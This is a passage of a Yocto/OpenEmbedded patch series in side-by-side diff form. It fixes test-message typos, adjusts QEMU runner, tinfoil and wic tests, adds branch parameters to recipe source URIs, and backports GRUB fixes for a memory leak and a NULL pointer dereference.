41 os.makedirs(os.path.dirname(recipefile)) 41 os.makedirs(os.path.dirname(recipefile))
42 srcuri = 'git://' + srcdir + ';protocol=file' 42 srcuri = 'git://' + srcdir + ';protocol=file;branch=master'
43 result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri]) 43 result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri])
44 self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output) 44 self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output)
45 45
@@ -137,7 +137,7 @@ class SStateTests(SStateBase):
137 filtered_results.append(r) 137 filtered_results.append(r)
138 self.assertTrue(filtered_results == [], msg="Found distro non-specific sstate for: %s (%s)" % (', '.join(map(str, targets)), str(filtered_results))) 138 self.assertTrue(filtered_results == [], msg="Found distro non-specific sstate for: %s (%s)" % (', '.join(map(str, targets)), str(filtered_results)))
139 file_tracker_1 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False) 139 file_tracker_1 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False)
140 self.assertTrue(len(file_tracker_1) >= len(targets), msg = "Not all sstate files ware created for: %s" % ', '.join(map(str, targets))) 140 self.assertTrue(len(file_tracker_1) >= len(targets), msg = "Not all sstate files were created for: %s" % ', '.join(map(str, targets)))
141 141
142 self.track_for_cleanup(self.distro_specific_sstate + "_old") 142 self.track_for_cleanup(self.distro_specific_sstate + "_old")
143 shutil.copytree(self.distro_specific_sstate, self.distro_specific_sstate + "_old") 143 shutil.copytree(self.distro_specific_sstate, self.distro_specific_sstate + "_old")
@@ -146,13 +146,13 @@ class SStateTests(SStateBase):
146 bitbake(['-cclean'] + targets) 146 bitbake(['-cclean'] + targets)
147 bitbake(targets) 147 bitbake(targets)
148 file_tracker_2 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False) 148 file_tracker_2 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False)
149 self.assertTrue(len(file_tracker_2) >= len(targets), msg = "Not all sstate files ware created for: %s" % ', '.join(map(str, targets))) 149 self.assertTrue(len(file_tracker_2) >= len(targets), msg = "Not all sstate files were created for: %s" % ', '.join(map(str, targets)))
150 150
151 not_recreated = [x for x in file_tracker_1 if x not in file_tracker_2] 151 not_recreated = [x for x in file_tracker_1 if x not in file_tracker_2]
152 self.assertTrue(not_recreated == [], msg="The following sstate files ware not recreated: %s" % ', '.join(map(str, not_recreated))) 152 self.assertTrue(not_recreated == [], msg="The following sstate files were not recreated: %s" % ', '.join(map(str, not_recreated)))
153 153
154 created_once = [x for x in file_tracker_2 if x not in file_tracker_1] 154 created_once = [x for x in file_tracker_2 if x not in file_tracker_1]
155 self.assertTrue(created_once == [], msg="The following sstate files ware created only in the second run: %s" % ', '.join(map(str, created_once))) 155 self.assertTrue(created_once == [], msg="The following sstate files were created only in the second run: %s" % ', '.join(map(str, created_once)))
156 156
157 def test_rebuild_distro_specific_sstate_cross_native_targets(self): 157 def test_rebuild_distro_specific_sstate_cross_native_targets(self):
158 self.run_test_rebuild_distro_specific_sstate(['binutils-cross-' + self.tune_arch, 'binutils-native'], temp_sstate_location=True) 158 self.run_test_rebuild_distro_specific_sstate(['binutils-cross-' + self.tune_arch, 'binutils-native'], temp_sstate_location=True)
@@ -202,9 +202,9 @@ class SStateTests(SStateBase):
202 actual_remaining_sstate = [x for x in self.search_sstate(target + r'.*?\.tgz$') if not any(pattern in x for pattern in ignore_patterns)] 202 actual_remaining_sstate = [x for x in self.search_sstate(target + r'.*?\.tgz$') if not any(pattern in x for pattern in ignore_patterns)]
203 203
204 actual_not_expected = [x for x in actual_remaining_sstate if x not in expected_remaining_sstate] 204 actual_not_expected = [x for x in actual_remaining_sstate if x not in expected_remaining_sstate]
205 self.assertFalse(actual_not_expected, msg="Files should have been removed but ware not: %s" % ', '.join(map(str, actual_not_expected))) 205 self.assertFalse(actual_not_expected, msg="Files should have been removed but were not: %s" % ', '.join(map(str, actual_not_expected)))
206 expected_not_actual = [x for x in expected_remaining_sstate if x not in actual_remaining_sstate] 206 expected_not_actual = [x for x in expected_remaining_sstate if x not in actual_remaining_sstate]
207 self.assertFalse(expected_not_actual, msg="Extra files ware removed: %s" ', '.join(map(str, expected_not_actual))) 207 self.assertFalse(expected_not_actual, msg="Extra files were removed: %s" ', '.join(map(str, expected_not_actual)))
208 208
209 def test_sstate_cache_management_script_using_pr_1(self): 209 def test_sstate_cache_management_script_using_pr_1(self):
210 global_config = [] 210 global_config = []
diff --git a/meta/lib/oeqa/selftest/cases/tinfoil.py b/meta/lib/oeqa/selftest/cases/tinfoil.py
index a51c6048d3..6668d7cdc8 100644
--- a/meta/lib/oeqa/selftest/cases/tinfoil.py
+++ b/meta/lib/oeqa/selftest/cases/tinfoil.py
@@ -65,6 +65,20 @@ class TinfoilTests(OESelftestTestCase):
65 localdata.setVar('PN', 'hello') 65 localdata.setVar('PN', 'hello')
66 self.assertEqual('hello', localdata.getVar('BPN')) 66 self.assertEqual('hello', localdata.getVar('BPN'))
67 67
68 # The config_data API tp parse_recipe_file is used by:
69 # layerindex-web layerindex/update_layer.py
70 def test_parse_recipe_custom_data(self):
71 with bb.tinfoil.Tinfoil() as tinfoil:
72 tinfoil.prepare(config_only=False, quiet=2)
73 localdata = bb.data.createCopy(tinfoil.config_data)
74 localdata.setVar("TESTVAR", "testval")
75 testrecipe = 'mdadm'
76 best = tinfoil.find_best_provider(testrecipe)
77 if not best:
78 self.fail('Unable to find recipe providing %s' % testrecipe)
79 rd = tinfoil.parse_recipe_file(best[3], config_data=localdata)
80 self.assertEqual("testval", rd.getVar('TESTVAR'))
81
68 def test_list_recipes(self): 82 def test_list_recipes(self):
69 with bb.tinfoil.Tinfoil() as tinfoil: 83 with bb.tinfoil.Tinfoil() as tinfoil:
70 tinfoil.prepare(config_only=False, quiet=2) 84 tinfoil.prepare(config_only=False, quiet=2)
@@ -87,23 +101,22 @@ class TinfoilTests(OESelftestTestCase):
87 with bb.tinfoil.Tinfoil() as tinfoil: 101 with bb.tinfoil.Tinfoil() as tinfoil:
88 tinfoil.prepare(config_only=True) 102 tinfoil.prepare(config_only=True)
89 103
90 tinfoil.set_event_mask(['bb.event.FilesMatchingFound', 'bb.command.CommandCompleted']) 104 tinfoil.set_event_mask(['bb.event.FilesMatchingFound', 'bb.command.CommandCompleted', 'bb.command.CommandFailed', 'bb.command.CommandExit'])
91 105
92 # Need to drain events otherwise events that were masked may still be in the queue 106 # Need to drain events otherwise events that were masked may still be in the queue
93 while tinfoil.wait_event(): 107 while tinfoil.wait_event():
94 pass 108 pass
95 109
96 pattern = 'conf' 110 pattern = 'conf'
97 res = tinfoil.run_command('findFilesMatchingInDir', pattern, 'conf/machine') 111 res = tinfoil.run_command('testCookerCommandEvent', pattern, handle_events=False)
98 self.assertTrue(res) 112 self.assertTrue(res)
99 113
100 eventreceived = False 114 eventreceived = False
101 commandcomplete = False 115 commandcomplete = False
102 start = time.time() 116 start = time.time()
103 # Wait for maximum 60s in total so we'd detect spurious heartbeat events for example 117 # Wait for maximum 120s in total so we'd detect spurious heartbeat events for example
104 # The test is IO load sensitive too
105 while (not (eventreceived == True and commandcomplete == True) 118 while (not (eventreceived == True and commandcomplete == True)
106 and (time.time() - start < 60)): 119 and (time.time() - start < 120)):
107 # if we received both events (on let's say a good day), we are done 120 # if we received both events (on let's say a good day), we are done
108 event = tinfoil.wait_event(1) 121 event = tinfoil.wait_event(1)
109 if event: 122 if event:
@@ -111,14 +124,15 @@ class TinfoilTests(OESelftestTestCase):
111 commandcomplete = True 124 commandcomplete = True
112 elif isinstance(event, bb.event.FilesMatchingFound): 125 elif isinstance(event, bb.event.FilesMatchingFound):
113 self.assertEqual(pattern, event._pattern) 126 self.assertEqual(pattern, event._pattern)
114 self.assertIn('qemuarm.conf', event._matches) 127 self.assertIn('A', event._matches)
128 self.assertIn('B', event._matches)
115 eventreceived = True 129 eventreceived = True
116 elif isinstance(event, logging.LogRecord): 130 elif isinstance(event, logging.LogRecord):
117 continue 131 continue
118 else: 132 else:
119 self.fail('Unexpected event: %s' % event) 133 self.fail('Unexpected event: %s' % event)
120 134
121 self.assertTrue(commandcomplete, 'Timed out waiting for CommandCompleted event from bitbake server') 135 self.assertTrue(commandcomplete, 'Timed out waiting for CommandCompleted event from bitbake server (Matching event received: %s)' % str(eventreceived))
122 self.assertTrue(eventreceived, 'Did not receive FilesMatchingFound event from bitbake server') 136 self.assertTrue(eventreceived, 'Did not receive FilesMatchingFound event from bitbake server')
123 137
124 def test_setvariable_clean(self): 138 def test_setvariable_clean(self):
diff --git a/meta/lib/oeqa/selftest/cases/wic.py b/meta/lib/oeqa/selftest/cases/wic.py
index 0435aa29c9..f7abdba015 100644
--- a/meta/lib/oeqa/selftest/cases/wic.py
+++ b/meta/lib/oeqa/selftest/cases/wic.py
@@ -905,14 +905,18 @@ class Wic2(WicTestCase):
905 @only_for_arch(['i586', 'i686', 'x86_64']) 905 @only_for_arch(['i586', 'i686', 'x86_64'])
906 def test_rawcopy_plugin_qemu(self): 906 def test_rawcopy_plugin_qemu(self):
907 """Test rawcopy plugin in qemu""" 907 """Test rawcopy plugin in qemu"""
908 # build ext4 and wic images 908 # build ext4 and then use it for a wic image
909 for fstype in ("ext4", "wic"): 909 config = 'IMAGE_FSTYPES = "ext4"\n'
910 config = 'IMAGE_FSTYPES = "%s"\nWKS_FILE = "test_rawcopy_plugin.wks.in"\n' % fstype 910 self.append_config(config)
911 self.append_config(config) 911 self.assertEqual(0, bitbake('core-image-minimal').status)
912 self.assertEqual(0, bitbake('core-image-minimal').status) 912 self.remove_config(config)
913 self.remove_config(config)
914 913
915 with runqemu('core-image-minimal', ssh=False, image_fstype='wic') as qemu: 914 config = 'IMAGE_FSTYPES = "wic"\nWKS_FILE = "test_rawcopy_plugin.wks.in"\n'
915 self.append_config(config)
916 self.assertEqual(0, bitbake('core-image-minimal-mtdutils').status)
917 self.remove_config(config)
918
919 with runqemu('core-image-minimal-mtdutils', ssh=False, image_fstype='wic') as qemu:
916 cmd = "grep sda. /proc/partitions |wc -l" 920 cmd = "grep sda. /proc/partitions |wc -l"
917 status, output = qemu.run_serial(cmd) 921 status, output = qemu.run_serial(cmd)
918 self.assertEqual(1, status, 'Failed to run command "%s": %s' % (cmd, output)) 922 self.assertEqual(1, status, 'Failed to run command "%s": %s' % (cmd, output))
diff --git a/meta/lib/oeqa/utils/buildproject.py b/meta/lib/oeqa/utils/buildproject.py
index e6d80cc8dc..dfb9661868 100644
--- a/meta/lib/oeqa/utils/buildproject.py
+++ b/meta/lib/oeqa/utils/buildproject.py
@@ -18,6 +18,7 @@ class BuildProject(metaclass=ABCMeta):
18 def __init__(self, uri, foldername=None, tmpdir=None, dl_dir=None): 18 def __init__(self, uri, foldername=None, tmpdir=None, dl_dir=None):
19 self.uri = uri 19 self.uri = uri
20 self.archive = os.path.basename(uri) 20 self.archive = os.path.basename(uri)
21 self.tempdirobj = None
21 if not tmpdir: 22 if not tmpdir:
22 self.tempdirobj = tempfile.TemporaryDirectory(prefix='buildproject-') 23 self.tempdirobj = tempfile.TemporaryDirectory(prefix='buildproject-')
23 tmpdir = self.tempdirobj.name 24 tmpdir = self.tempdirobj.name
@@ -57,6 +58,8 @@ class BuildProject(metaclass=ABCMeta):
57 return self._run('cd %s; make install %s' % (self.targetdir, install_args)) 58 return self._run('cd %s; make install %s' % (self.targetdir, install_args))
58 59
59 def clean(self): 60 def clean(self):
61 if self.tempdirobj:
62 self.tempdirobj.cleanup()
60 if not self.needclean: 63 if not self.needclean:
61 return 64 return
62 self._run('rm -rf %s' % self.targetdir) 65 self._run('rm -rf %s' % self.targetdir)
diff --git a/meta/lib/oeqa/utils/commands.py b/meta/lib/oeqa/utils/commands.py
index a71c16ab14..024261410e 100644
--- a/meta/lib/oeqa/utils/commands.py
+++ b/meta/lib/oeqa/utils/commands.py
@@ -174,11 +174,8 @@ def runCmd(command, ignore_status=False, timeout=None, assert_error=True, sync=T
174 if native_sysroot: 174 if native_sysroot:
175 extra_paths = "%s/sbin:%s/usr/sbin:%s/usr/bin" % \ 175 extra_paths = "%s/sbin:%s/usr/sbin:%s/usr/bin" % \
176 (native_sysroot, native_sysroot, native_sysroot) 176 (native_sysroot, native_sysroot, native_sysroot)
177 extra_libpaths = "%s/lib:%s/usr/lib" % \
178 (native_sysroot, native_sysroot)
179 nenv = dict(options.get('env', os.environ)) 177 nenv = dict(options.get('env', os.environ))
180 nenv['PATH'] = extra_paths + ':' + nenv.get('PATH', '') 178 nenv['PATH'] = extra_paths + ':' + nenv.get('PATH', '')
181 nenv['LD_LIBRARY_PATH'] = extra_libpaths + ':' + nenv.get('LD_LIBRARY_PATH', '')
182 options['env'] = nenv 179 options['env'] = nenv
183 180
184 cmd = Command(command, timeout=timeout, output_log=output_log, **options) 181 cmd = Command(command, timeout=timeout, output_log=output_log, **options)
diff --git a/meta/lib/oeqa/utils/metadata.py b/meta/lib/oeqa/utils/metadata.py
index 8013aa684d..15ec190c4a 100644
--- a/meta/lib/oeqa/utils/metadata.py
+++ b/meta/lib/oeqa/utils/metadata.py
@@ -27,9 +27,9 @@ def metadata_from_bb():
27 data_dict = get_bb_vars() 27 data_dict = get_bb_vars()
28 28
29 # Distro information 29 # Distro information
30 info_dict['distro'] = {'id': data_dict['DISTRO'], 30 info_dict['distro'] = {'id': data_dict.get('DISTRO', 'NODISTRO'),
31 'version_id': data_dict['DISTRO_VERSION'], 31 'version_id': data_dict.get('DISTRO_VERSION', 'NO_DISTRO_VERSION'),
32 'pretty_name': '%s %s' % (data_dict['DISTRO'], data_dict['DISTRO_VERSION'])} 32 'pretty_name': '%s %s' % (data_dict.get('DISTRO', 'NODISTRO'), data_dict.get('DISTRO_VERSION', 'NO_DISTRO_VERSION'))}
33 33
34 # Host distro information 34 # Host distro information
35 os_release = get_os_release() 35 os_release = get_os_release()
diff --git a/meta/lib/oeqa/utils/nfs.py b/meta/lib/oeqa/utils/nfs.py
index a37686c914..c9bac050a4 100644
--- a/meta/lib/oeqa/utils/nfs.py
+++ b/meta/lib/oeqa/utils/nfs.py
@@ -8,7 +8,7 @@ from oeqa.utils.commands import bitbake, get_bb_var, Command
8from oeqa.utils.network import get_free_port 8from oeqa.utils.network import get_free_port
9 9
10@contextlib.contextmanager 10@contextlib.contextmanager
11def unfs_server(directory, logger = None): 11def unfs_server(directory, logger = None, udp = True):
12 unfs_sysroot = get_bb_var("RECIPE_SYSROOT_NATIVE", "unfs3-native") 12 unfs_sysroot = get_bb_var("RECIPE_SYSROOT_NATIVE", "unfs3-native")
13 if not os.path.exists(os.path.join(unfs_sysroot, "usr", "bin", "unfsd")): 13 if not os.path.exists(os.path.join(unfs_sysroot, "usr", "bin", "unfsd")):
14 # build native tool 14 # build native tool
@@ -22,7 +22,7 @@ def unfs_server(directory, logger = None):
22 exports.write("{0} (rw,no_root_squash,no_all_squash,insecure)\n".format(directory).encode()) 22 exports.write("{0} (rw,no_root_squash,no_all_squash,insecure)\n".format(directory).encode())
23 23
24 # find some ports for the server 24 # find some ports for the server
25 nfsport, mountport = get_free_port(udp = True), get_free_port(udp = True) 25 nfsport, mountport = get_free_port(udp), get_free_port(udp)
26 26
27 nenv = dict(os.environ) 27 nenv = dict(os.environ)
28 nenv['PATH'] = "{0}/sbin:{0}/usr/sbin:{0}/usr/bin:".format(unfs_sysroot) + nenv.get('PATH', '') 28 nenv['PATH'] = "{0}/sbin:{0}/usr/sbin:{0}/usr/bin:".format(unfs_sysroot) + nenv.get('PATH', '')
diff --git a/meta/lib/oeqa/utils/qemurunner.py b/meta/lib/oeqa/utils/qemurunner.py
index 77ec939ad7..c84d299a80 100644
--- a/meta/lib/oeqa/utils/qemurunner.py
+++ b/meta/lib/oeqa/utils/qemurunner.py
@@ -70,6 +70,8 @@ class QemuRunner:
70 self.monitorpipe = None 70 self.monitorpipe = None
71 71
72 self.logger = logger 72 self.logger = logger
73 # Whether we're expecting an exit and should show related errors
74 self.canexit = False
73 75
74 # Enable testing other OS's 76 # Enable testing other OS's
75 # Set commands for target communication, and default to Linux ALWAYS 77 # Set commands for target communication, and default to Linux ALWAYS
@@ -118,7 +120,10 @@ class QemuRunner:
118 import fcntl 120 import fcntl
119 fl = fcntl.fcntl(o, fcntl.F_GETFL) 121 fl = fcntl.fcntl(o, fcntl.F_GETFL)
120 fcntl.fcntl(o, fcntl.F_SETFL, fl | os.O_NONBLOCK) 122 fcntl.fcntl(o, fcntl.F_SETFL, fl | os.O_NONBLOCK)
121 return os.read(o.fileno(), 1000000).decode("utf-8") 123 try:
124 return os.read(o.fileno(), 1000000).decode("utf-8")
125 except BlockingIOError:
126 return ""
122 127
123 128
124 def handleSIGCHLD(self, signum, frame): 129 def handleSIGCHLD(self, signum, frame):
@@ -229,7 +234,7 @@ class QemuRunner:
229 r = os.fdopen(r) 234 r = os.fdopen(r)
230 x = r.read() 235 x = r.read()
231 os.killpg(os.getpgid(self.runqemu.pid), signal.SIGTERM) 236 os.killpg(os.getpgid(self.runqemu.pid), signal.SIGTERM)
232 sys.exit(0) 237 os._exit(0)
233 238
234 self.logger.debug("runqemu started, pid is %s" % self.runqemu.pid) 239 self.logger.debug("runqemu started, pid is %s" % self.runqemu.pid)
235 self.logger.debug("waiting at most %s seconds for qemu pid (%s)" % 240 self.logger.debug("waiting at most %s seconds for qemu pid (%s)" %
@@ -427,12 +432,17 @@ class QemuRunner:
427 except OSError as e: 432 except OSError as e:
428 if e.errno != errno.ESRCH: 433 if e.errno != errno.ESRCH:
429 raise 434 raise
430 endtime = time.time() + self.runqemutime 435 try:
431 while self.runqemu.poll() is None and time.time() < endtime: 436 outs, errs = self.runqemu.communicate(timeout = self.runqemutime)
432 time.sleep(1) 437 if outs:
433 if self.runqemu.poll() is None: 438 self.logger.info("Output from runqemu:\n%s", outs.decode("utf-8"))
439 if errs:
440 self.logger.info("Stderr from runqemu:\n%s", errs.decode("utf-8"))
441 except TimeoutExpired:
434 self.logger.debug("Sending SIGKILL to runqemu") 442 self.logger.debug("Sending SIGKILL to runqemu")
435 os.killpg(os.getpgid(self.runqemu.pid), signal.SIGKILL) 443 os.killpg(os.getpgid(self.runqemu.pid), signal.SIGKILL)
444 if not self.runqemu.stdout.closed:
445 self.logger.info("Output from runqemu:\n%s" % self.getOutput(self.runqemu.stdout))
436 self.runqemu.stdin.close() 446 self.runqemu.stdin.close()
437 self.runqemu.stdout.close() 447 self.runqemu.stdout.close()
438 self.runqemu_exited = True 448 self.runqemu_exited = True
@@ -467,6 +477,11 @@ class QemuRunner:
467 self.thread.stop() 477 self.thread.stop()
468 self.thread.join() 478 self.thread.join()
469 479
480 def allowexit(self):
481 self.canexit = True
482 if self.thread:
483 self.thread.allowexit()
484
470 def restart(self, qemuparams = None): 485 def restart(self, qemuparams = None):
471 self.logger.warning("Restarting qemu process") 486 self.logger.warning("Restarting qemu process")
472 if self.runqemu.poll() is None: 487 if self.runqemu.poll() is None:
@@ -522,7 +537,9 @@ class QemuRunner:
522 if re.search(self.boot_patterns['search_cmd_finished'], data): 537 if re.search(self.boot_patterns['search_cmd_finished'], data):
523 break 538 break
524 else: 539 else:
525 raise Exception("No data on serial console socket") 540 if self.canexit:
541 return (1, "")
542 raise Exception("No data on serial console socket, connection closed?")
526 543
527 if data: 544 if data:
528 if raw: 545 if raw:
@@ -560,6 +577,7 @@ class LoggingThread(threading.Thread):
560 self.logger = logger 577 self.logger = logger
561 self.readsock = None 578 self.readsock = None
562 self.running = False 579 self.running = False
580 self.canexit = False
563 581
564 self.errorevents = select.POLLERR | select.POLLHUP | select.POLLNVAL 582 self.errorevents = select.POLLERR | select.POLLHUP | select.POLLNVAL
565 self.readevents = select.POLLIN | select.POLLPRI 583 self.readevents = select.POLLIN | select.POLLPRI
@@ -593,6 +611,9 @@ class LoggingThread(threading.Thread):
593 self.close_ignore_error(self.writepipe) 611 self.close_ignore_error(self.writepipe)
594 self.running = False 612 self.running = False
595 613
614 def allowexit(self):
615 self.canexit = True
616
596 def eventloop(self): 617 def eventloop(self):
597 poll = select.poll() 618 poll = select.poll()
598 event_read_mask = self.errorevents | self.readevents 619 event_read_mask = self.errorevents | self.readevents
@@ -638,7 +659,7 @@ class LoggingThread(threading.Thread):
638 data = self.readsock.recv(count) 659 data = self.readsock.recv(count)
639 except socket.error as e: 660 except socket.error as e:
640 if e.errno == errno.EAGAIN or e.errno == errno.EWOULDBLOCK: 661 if e.errno == errno.EAGAIN or e.errno == errno.EWOULDBLOCK:
641 return '' 662 return b''
642 else: 663 else:
643 raise 664 raise
644 665
@@ -649,7 +670,9 @@ class LoggingThread(threading.Thread):
649 # happened. But for this code it counts as an 670 # happened. But for this code it counts as an
650 # error since the connection shouldn't go away 671 # error since the connection shouldn't go away
651 # until qemu exits. 672 # until qemu exits.
652 raise Exception("Console connection closed unexpectedly") 673 if not self.canexit:
674 raise Exception("Console connection closed unexpectedly")
675 return b''
653 676
654 return data 677 return data
655 678
diff --git a/meta/lib/oeqa/utils/targetbuild.py b/meta/lib/oeqa/utils/targetbuild.py
index 1055810ca3..09738add1d 100644
--- a/meta/lib/oeqa/utils/targetbuild.py
+++ b/meta/lib/oeqa/utils/targetbuild.py
@@ -19,6 +19,7 @@ class BuildProject(metaclass=ABCMeta):
19 self.d = d 19 self.d = d
20 self.uri = uri 20 self.uri = uri
21 self.archive = os.path.basename(uri) 21 self.archive = os.path.basename(uri)
22 self.tempdirobj = None
22 if not tmpdir: 23 if not tmpdir:
23 tmpdir = self.d.getVar('WORKDIR') 24 tmpdir = self.d.getVar('WORKDIR')
24 if not tmpdir: 25 if not tmpdir:
@@ -71,9 +72,10 @@ class BuildProject(metaclass=ABCMeta):
71 return self._run('cd %s; make install %s' % (self.targetdir, install_args)) 72 return self._run('cd %s; make install %s' % (self.targetdir, install_args))
72 73
73 def clean(self): 74 def clean(self):
75 if self.tempdirobj:
76 self.tempdirobj.cleanup()
74 self._run('rm -rf %s' % self.targetdir) 77 self._run('rm -rf %s' % self.targetdir)
75 subprocess.check_call('rm -f %s' % self.localarchive, shell=True) 78 subprocess.check_call('rm -f %s' % self.localarchive, shell=True)
76 pass
77 79
78class TargetBuildProject(BuildProject): 80class TargetBuildProject(BuildProject):
79 81
diff --git a/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb b/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
index 5d6f200a73..e9dfa0770e 100644
--- a/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
+++ b/meta/recipes-bsp/efibootmgr/efibootmgr_17.bb
@@ -10,7 +10,7 @@ DEPENDS = "efivar popt"
10 10
11COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux" 11COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux"
12 12
13SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https \ 13SRC_URI = "git://github.com/rhinstaller/efibootmgr.git;protocol=https;branch=master \
14 file://0001-remove-extra-decl.patch \ 14 file://0001-remove-extra-decl.patch \
15 file://97668ae0bce776a36ea2001dea63d376be8274ac.patch \ 15 file://97668ae0bce776a36ea2001dea63d376be8274ac.patch \
16 " 16 "
diff --git a/meta/recipes-bsp/efivar/efivar/determinism.patch b/meta/recipes-bsp/efivar/efivar/determinism.patch
new file mode 100644
index 0000000000..bdf6bfc4a8
--- /dev/null
+++ b/meta/recipes-bsp/efivar/efivar/determinism.patch
@@ -0,0 +1,18 @@
1Fix reproducibility issue caused by unsorted wildcard expansion.
2
3Upstream-Status: Pending
4RP 2021/3/1
5
6Index: git/src/Makefile
7===================================================================
8--- git.orig/src/Makefile
9+++ git/src/Makefile
10@@ -15,7 +15,7 @@ TARGETS=$(LIBTARGETS) $(BINTARGETS) $(PC
11 STATICTARGETS=$(STATICLIBTARGETS) $(STATICBINTARGETS)
12
13 LIBEFIBOOT_SOURCES = crc32.c creator.c disk.c gpt.c loadopt.c path-helpers.c \
14- linux.c $(wildcard linux-*.c)
15+ linux.c $(sort $(wildcard linux-*.c))
16 LIBEFIBOOT_OBJECTS = $(patsubst %.c,%.o,$(LIBEFIBOOT_SOURCES))
17 LIBEFIVAR_SOURCES = dp.c dp-acpi.c dp-hw.c dp-media.c dp-message.c \
18 efivarfs.c error.c export.c guid.c guids.S guid-symbols.c \
diff --git a/meta/recipes-bsp/efivar/efivar_37.bb b/meta/recipes-bsp/efivar/efivar_37.bb
index 9b95721a4e..858c61ae6a 100644
--- a/meta/recipes-bsp/efivar/efivar_37.bb
+++ b/meta/recipes-bsp/efivar/efivar_37.bb
@@ -7,7 +7,8 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=6626bb1e20189cfa95f2c508ba286393"
7 7
8COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux" 8COMPATIBLE_HOST = "(i.86|x86_64|arm|aarch64).*-linux"
9 9
10SRC_URI = "git://github.com/rhinstaller/efivar.git \ 10SRC_URI = "git://github.com/rhinstaller/efivar.git;branch=main;protocol=https \
11 file://determinism.patch \
11 file://no-werror.patch" 12 file://no-werror.patch"
12SRCREV = "c1d6b10e1ed4ba2be07f385eae5bceb694478a10" 13SRCREV = "c1d6b10e1ed4ba2be07f385eae5bceb694478a10"
13 14
diff --git a/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb b/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb
index 9954d7f57a..191b0bc176 100644
--- a/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb
+++ b/meta/recipes-bsp/gnu-efi/gnu-efi_3.0.11.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Libraries for producing EFI binaries" 1SUMMARY = "Libraries for producing EFI binaries"
2HOMEPAGE = "http://sourceforge.net/projects/gnu-efi/" 2HOMEPAGE = "http://sourceforge.net/projects/gnu-efi/"
3DESCRIPTION = "GNU-EFI aims to Develop EFI applications for ARM-64, ARM-32, x86_64, IA-64 (IPF), IA-32 (x86), and MIPS platforms using the GNU toolchain and the EFI development environment."
3SECTION = "devel" 4SECTION = "devel"
4LICENSE = "GPLv2+ | BSD-2-Clause" 5LICENSE = "GPLv2+ | BSD-2-Clause"
5LIC_FILES_CHKSUM = "file://gnuefi/crt0-efi-arm.S;beginline=4;endline=16;md5=e582764a4776e60c95bf9ab617343d36 \ 6LIC_FILES_CHKSUM = "file://gnuefi/crt0-efi-arm.S;beginline=4;endline=16;md5=e582764a4776e60c95bf9ab617343d36 \
diff --git a/meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch b/meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch
new file mode 100644
index 0000000000..eaaa7effae
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0001-mmap-Fix-memory-leak-when-iterating-over-mapped-memo.patch
@@ -0,0 +1,39 @@
1From 0900f11def2e7fbb4880efff0cd9c9b32f1cdb86 Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Thu, 3 Dec 2020 14:39:45 +0000
4Subject: [PATCH] mmap: Fix memory leak when iterating over mapped memory
5
6When returning from grub_mmap_iterate() the memory allocated to present
7is not being released causing it to leak.
8
9Fixes: CID 96655
10
11Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
12Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
13
14Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8cb2848f9699642a698af84b12ba187cab722031]
15Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
16---
17 grub-core/mmap/mmap.c | 2 ++
18 1 file changed, 2 insertions(+)
19
20diff --git a/grub-core/mmap/mmap.c b/grub-core/mmap/mmap.c
21index 7ebf32e..8bf235f 100644
22--- a/grub-core/mmap/mmap.c
23+++ b/grub-core/mmap/mmap.c
24@@ -270,6 +270,7 @@ grub_mmap_iterate (grub_memory_hook_t hook, void *hook_data)
25 hook_data))
26 {
27 grub_free (ctx.scanline_events);
28+ grub_free (present);
29 return GRUB_ERR_NONE;
30 }
31
32@@ -282,6 +283,7 @@ grub_mmap_iterate (grub_memory_hook_t hook, void *hook_data)
33 }
34
35 grub_free (ctx.scanline_events);
36+ grub_free (present);
37 return GRUB_ERR_NONE;
38 }
39
diff --git a/meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch b/meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch
new file mode 100644
index 0000000000..d00821f5c3
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0002-net-net-Fix-possible-dereference-to-of-a-NULL-pointe.patch
@@ -0,0 +1,39 @@
1From f216a75e884ed5e4e94bf86965000dde51148f94 Mon Sep 17 00:00:00 2001
2From: Darren Kenny <darren.kenny@oracle.com>
3Date: Fri, 27 Nov 2020 15:10:26 +0000
4Subject: [PATCH] net/net: Fix possible dereference to of a NULL pointer
5
6It is always possible that grub_zalloc() could fail, so we should check for
7a NULL return. Otherwise we run the risk of dereferencing a NULL pointer.
8
9Fixes: CID 296221
10
11Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
12Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
13
14Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=03f2515ae0c503406f1a99a2178405049c6555db]
